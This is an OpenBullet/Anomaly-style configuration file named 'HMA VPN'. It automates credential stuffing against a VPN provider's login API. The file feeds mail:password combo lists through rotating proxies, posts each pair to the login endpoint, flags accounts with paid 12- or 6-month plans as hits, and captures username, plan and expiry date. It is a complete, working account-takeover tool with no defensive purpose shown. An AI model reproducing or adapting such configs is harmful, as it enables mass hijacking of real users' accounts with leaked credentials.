[SETTINGS]
{
  "Name": "HMA VPN",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2020-05-18T23:46:56.0378767+02:00",
  "AdditionalInfo": "",
  "Author": "H0S31N",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Post REQUEST POST "https://securenetconnection.com/clapi/v1.5/user/login" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid username/password combination" 
  KEYCHAIN Success OR 
    KEY "\",\"plan\":\"12 Months\"" 
    KEY "plan\":\"6 Months\"" 
  KEYCHAIN Retry OR 
    KEY "Error has occurred" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"plan\":\"\"" 
    KEY "\",\"expires\":\"1970-01-01" 

#UserName PARSE "<SOURCE>" LR "\"user\":\"" "\"," -> CAP "UserName" 

#Plan PARSE "<SOURCE>" LR "\",\"plan\":\"" "\",\"" -> CAP "Plan" 

#Renew PARSE "<SOURCE>" LR "\",\"expires\":\"" "T" -> CAP "Renew" 

